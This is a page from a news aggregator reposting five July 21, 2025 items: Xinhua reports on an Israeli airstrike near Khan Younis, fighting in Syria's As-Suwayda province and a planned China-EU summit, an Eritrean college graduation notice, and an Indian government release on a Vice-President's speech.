    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: 14 Palestinians killed in Israeli airstrike in southern Gaza – sources

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    GAZA, July 21 (Xinhua) — At least 14 Palestinians, including a civil defense worker, were killed Sunday in an Israeli airstrike on a college building west of Khan Younis in the southern Gaza Strip, Palestinian sources said.

    Israeli warplanes fired at least one missile at a building housing displaced people in the al-Mawasi area west of Khan Younis, witnesses said.

    Doctors told Xinhua that all the bodies found, as well as the wounded, were taken to hospitals.

    The airstrike killed civil defense officer Hani al-Dabour and wounded several members of his team, according to a local government statement. The government called on the international community to fulfill its obligations to “stop Israel’s crimes and ensure full protection for the work crews.”

    In a statement on Sunday, the Israel Defense Forces (IDF) said that the paratroopers’ brigade, under the command of the 36th Division, had completed its mission in the Khan Yunis area of the Gaza Strip.

    “During the operation, the troops eliminated the terrorists in hand-to-hand combat and in cooperation with the Israeli Air Force. They destroyed the terrorists’ infrastructure, including military installations, weapons and explosives depots,” the statement said.

    Israel resumed military operations in the Gaza Strip on March 18. Since then, at least 8,066 Palestinians have been killed and 28,939 wounded. The total number of deaths since October 2023 has reached 58,895, with 140,980 injured, the enclave’s health authorities said on Sunday. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: New clashes break out in Syria’s As-Suwayda province

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    DAMASCUS, July 21 (Xinhua) — Fierce clashes broke out between Druze militias and Bedouin tribes supporting the interim government in rural areas of southern Syria on Sunday, threatening a fragile ceasefire in the region, activists said.

    The Britain-based Syrian Observatory for Human Rights said large numbers of Bedouin reinforcements had gathered in the villages of Bustan, Dama and Najran, and there were signs of preparations to storm neighbouring Druze areas.

    Heavy fighting broke out in the towns of Arika and Umm al-Zeitoun, located along the Damascus-Suwayda highway, with Bedouins reportedly burning homes and looting property. The violence led to the closure of two key roads, further increasing tensions in the already volatile area.

    An expected prisoner exchange between the two sides was called off after mortar shells, believed to have been fired from Bedouin positions, landed near the planned transfer site.

    At least 1,120 people have been killed since fighting began on July 13, according to the observatory, including more than 100 civilians and dozens of government troops. For now, tensions remain high in the region and the ceasefire remains in jeopardy. –0–

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Africa: Eritrea: Mai-Nefhi College of Engineering and Technology Graduates 383 Students

    Source: APO – Report:

    .

    In its 18th commencement, Mai-Nefhi College of Engineering and Technology graduated 383 students, including 44% female graduates, in degree and diploma programs yesterday, 19 July.

    The degree program graduates include 13 in Agricultural Engineering, 26 in Chemical Engineering, 30 in Civil Engineering, 39 in Computer Science and Technology, 27 in Electrical and Electronics Technology, 27 in Mechanical Technology, and 28 in Mining Technology.

    The diploma program graduates include 23 in Automotive Technology, 28 in Computer Application, 18 in Computer Technology and Networking, 13 in Construction Technology, 23 in Electrical Technology, 24 in Electronics Technology, 26 in Mining Technology, 11 in Surveying, and 11 in Cooling System Technology.

    Dr. Araya Zeray, Dean of the College, stated that since its establishment in 2004, the College has been providing higher education in eight fields of study in degree programs and nine in diploma programs, significantly contributing to the production of professionals who play a vital role in the country’s economic development.

    Dr. Araya further noted that the College has 79 academic staff members—44 foreigners and 35 nationals. He also mentioned that as part of ongoing staff development efforts, 18 staff members are currently pursuing master’s and PhD programs abroad in Russia, China, India, Hungary, and Japan.

    A representative of the graduates, commending the support of parents, lecturers, and the college community, expressed their commitment to live up to the expectations of the Government and people who provided them with the opportunity for higher education.

    The honorary guest, Mr. Abraha Asfaha, Minister of Public Works, underlined the significance of engineering and technology in national economic development and called on the graduates to apply their knowledge practically in their respective workplaces.

    Since its establishment, Mai-Nefhi College of Engineering and Technology has graduated 7,671 students in degree and diploma programs.

    – on behalf of Ministry of Information, Eritrea.

    MIL OSI Africa –

    July 21, 2025
  • All decisions in this country, a sovereign nation, are taken by its leadership-VP

    Source: Government of India

    Source: Government of India (2)

    lign=”center”>There is no power on the planet to dictate India how to handle its affairs-VP
    We work in tandem, we have mutual respect, diplomatic dialogues. But at the end of the day, we are sovereign, we take our own decisions-VP
    Is it required to have wrestling sessions as to who said what?, VP expresses concern
    Our object is not to just simply grow our economy, Our object is to develop the people-VP
    Vice-President Addresses Officer Trainees of the Indian Defence Estates Service (IDES) 2024 Batch

    Vice-President, Shri Jagdeep Dhankhar today said that, “Don’t be guided by narratives outside. All decisions in this country, a sovereign nation, are taken by its leadership. There is no power on the planet to dictate India how to handle its affairs. We do live in a nation and nations that are a comity. We work in togetherness, we work in tandem. We have mutual respect, diplomatic dialogues. But at the end of the day, we are sovereign, we take our own decisions.”

    https://x.com/VPIndia/status/1946559722725007704

    He underlined, “Is it required to play every bad ball? Is it required to have wrestling sessions as to who said what? One who scores good runs on the cricket pitch always leaves bad balls. They are tempting, but not attempted. And those who attempt, you have safe gloves of the wicket keeper and someone in the gully.”

    “There will be challenges. Challenges will be to create divisiveness. For example, we have seen global conflagrations — two of them in particular, you know them. These have become open-ended. Look at the devastation of property, human lives, and their misery. And look at our calibration. We taught a lesson — taught it well. We chose Bahawalpur and Muridke, and then brought it to a temporary conclusion. ‘Operation Sindoor’ is not over — it continues. Some people ask the question — why was it stopped? We are a nation that believes in peace, nonviolence, a land of Buddha, Mahavira, and Gandhi. We do not wish to kill even living beings — how can we target human beings? The idea was to generate sanity, to generate a sense of humanity in the others”, he added.

    https://x.com/VPIndia/status/1946562875889463711

    Addressing the officer trainees of Indian Defence Estates Service (IDES) 2024 batch at the Vice-President’s Enclave today, Shri Dhankhar stated, “ Our demographic dividend is a global envy. 65% of our population is below 35 years of age. The median age of this country is 28, whereas that of China and the U.S. is around 38–39, and Japan, 48. Now, you are the chosen ones. You’ve got the opportunity to serve Bharat, home to one-sixth of humanity. And look at the area of your working. If you commit yourself, keeping into view our civilizational ethos, we are a unique nation. No nation can boast or claim to be closer to us — five thousand years of heritage, culture, legacy, knowledge, wisdom, repository. In such a situation — eighteen lakh acres? If you engage — which you are engaging, your seniors are engaging — you can define to the entire country, how to manage the estates, how to manage ecology, how to manage the environment, how to raise herbal gardens, what is sustainable development, how to protect and how to use modern technology.”

    “One aspect about which I am slightly concerned. Development, civilian development, close to the proximity of your states, requires your sanction. That sanction often gets into the domain of discretion and suffers delay. I would urge — evolve a mechanism or a protocol. Let people know about it — what height they can have. Why should the system come into play? With the kind of technology we have, we should be fully aware. Why can’t we put it on one platform? This is the area — if your building is coming up here, height will be this. Yet agencies have to be hired. People have to pay for it. Delay takes place. Now you can take the lead. You will earn the goodwill of the people around”, he added.

    https://x.com/VPIndia/status/1946560846785917408

    Expressing his concern over rising coaching centres in the country he stated, “Coaching is needed for skill. Coaching is needed to make you self-dependent. If for a limited number of seats, all over the country there are coaching centers vying with one another for advertisement space in newspapers. Not one — one page, two pages, three pages, sometimes four pages in a row. And what a spectacle — putting you boys and girls in photographs. No, this is not Bharat. We can’t have commodification and commercialisation. We have to believe in Gurukul. You have to come out of — youth has to come out of the silos. You have to know the opportunities elsewhere. Those opportunities are also very necessary for the development of the nation….I am not against anyone, but why should coaching become an integral part of education? After more than three decades, the nation has been blessed after getting input from stakeholders in hundreds of thousands, National Education Policy. Why coaching? Coach has to improve your skill. We can’t have people cramming and then getting through. We want thinking minds to get in and go there. Always bear that in mind”. 

    https://x.com/VPIndia/status/1946561334973460885

    Talking about ‘Viksit Bharat’ he stated, “ Our object is not to just simply grow our economy. Our object is to develop the people. Viksit Bharat is not our dream. It is not even our destination now. We are marching in that direction. Every day we are progressing towards that direction, and that’s a big challenge because 10 years of phenomenal development has given the people a taste of development. People of my generation never believed…there will be a toilet in the house, a gas connection in the house, internet connection, piped water, roads close by, school or health center, such world-class trains to travel. No. We never imagined. So the nation now has become globally the most aspirational nation in the world.”

    https://x.com/VPIndia/status/1946550260601606602

    Shri Rajesh Kumar Singh, Defence Secretary, Govt. of India, Shri S.N. Gupta, Director General, Defence Estates, Shri Sanjeev Kumar, Director, NIDEM and other dignitaries were also present on the occasion.

    July 21, 2025
  • MIL-OSI Russia: China and EU to hold 25th China-EU leaders’ meeting in Beijing /detailed version-1/

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — According to an agreement between China and the European Union (EU), European Council President Antonio Costa and European Commission President Ursula von der Leyen will visit China on July 24. Chinese President Xi Jinping will meet with them, a Chinese Foreign Ministry spokesperson said in Beijing on Monday.

    A Chinese Foreign Ministry spokesman added that Chinese Premier Li Qiang and the two EU leaders will jointly chair the 25th China-EU leaders’ meeting. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
←Previous Page
1 … 40 41 42 43 44 … 730
Next Page→
NewzIntel.com

NewzIntel.com

MIL Open Source Intelligence

  • Blog
  • About
  • FAQs
  • Authors
  • Events
  • Shop
  • Patterns
  • Themes

Twenty Twenty-Five

Designed with WordPress